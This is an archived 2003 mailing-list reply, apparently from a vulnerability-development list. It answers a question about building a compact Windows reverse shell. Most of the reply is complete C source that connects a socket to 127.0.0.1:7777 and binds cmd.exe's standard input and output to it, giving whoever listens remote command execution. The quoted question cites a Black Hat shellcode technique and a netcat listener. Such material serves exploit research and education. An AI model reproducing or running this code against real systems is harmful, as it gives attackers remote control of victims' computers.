Re: Windows reverse Shell

From: 3APA3A (3APA3Aat_private)
Date: Tue Feb 04 2003 - 08:34:56 PST


    Dear NetNinja,
    
    The code below successfully brings a reverse shell to 127.0.0.1:7777.
    
    #include <winsock2.h>   /* must come before windows.h, or the old winsock.h is pulled in */
    #include <windows.h>
    #include <stdio.h>
    #include <string.h>     /* memset */
    #pragma comment(lib, "ws2_32.lib")   /* link against Winsock 2 */
    
    int main(int argc, char* argv[]){
     WSADATA wd;
     SOCKET sock;
     STARTUPINFOA si;             /* explicit ANSI variants so the char* command line matches */
     PROCESS_INFORMATION  pi;
     struct sockaddr_in sin;
     int size = sizeof(sin);
     char cmd[] = "cmd.exe";      /* CreateProcess may modify lpCommandLine, so pass a writable buffer */
    
     memset(&sin, 0, sizeof(sin));
     memset(&si, 0, sizeof(si));
     if (WSAStartup(MAKEWORD( 1, 1 ), &wd) != 0) return 1;
     /* dwFlags 0 gives a non-overlapped socket, which the child can use with
        ordinary ReadFile/WriteFile; socket() would return an overlapped one. */
     sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
     if (sock == INVALID_SOCKET) return 1;
     sin.sin_family = AF_INET;
     bind(sock, (struct sockaddr*)&sin, size);   /* any local address, ephemeral port */
     sin.sin_port = htons(7777);
     sin.sin_addr.s_addr = inet_addr("127.0.0.1");
     if (connect(sock, (struct sockaddr*)&sin, size) == SOCKET_ERROR) return 1;
     si.cb = sizeof(si);
     si.dwFlags = STARTF_USESTDHANDLES;
     /* the socket handle is inheritable and serves as all three std handles */
     si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;
     CreateProcessA(
            NULL,
            cmd,
            NULL,
            NULL,
            TRUE,     /* bInheritHandles: the child must inherit the socket handle */
            0,
            0,
            NULL,
            &si,
            &pi
     );
     return 0;
    }
    
    
    
    --Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-devat_private:
    
    N> Hello guys,
    
    N> David Litchfield, in his Blackhat talk, talked about using the socket handle
    N> from WSASocket() and passing that handle as a parameter for stdin, stdout
    N> and stderr to the CreateProcess function. By doing it this way his reverse
    N> cmd shellcode becomes much smaller. I tried coding that reverse
    N> command shell in C, but couldn't get it to work. It simply connects to
    N> my listening netcat listener and then disconnects. David Litchfield
    N> used four functions to achieve that: WSASocket, bind, connect and
    N> CreateProcess. A little help would be appreciated on building this reverse
    N> cmd shell. Thanks.
      
    
    
    
    -- 
    ~/ZARAZA
    Venerable fossils! I await your further letters.  (Twain)
    



    This archive was generated by hypermail 2b30 : Tue Feb 04 2003 - 09:35:03 PST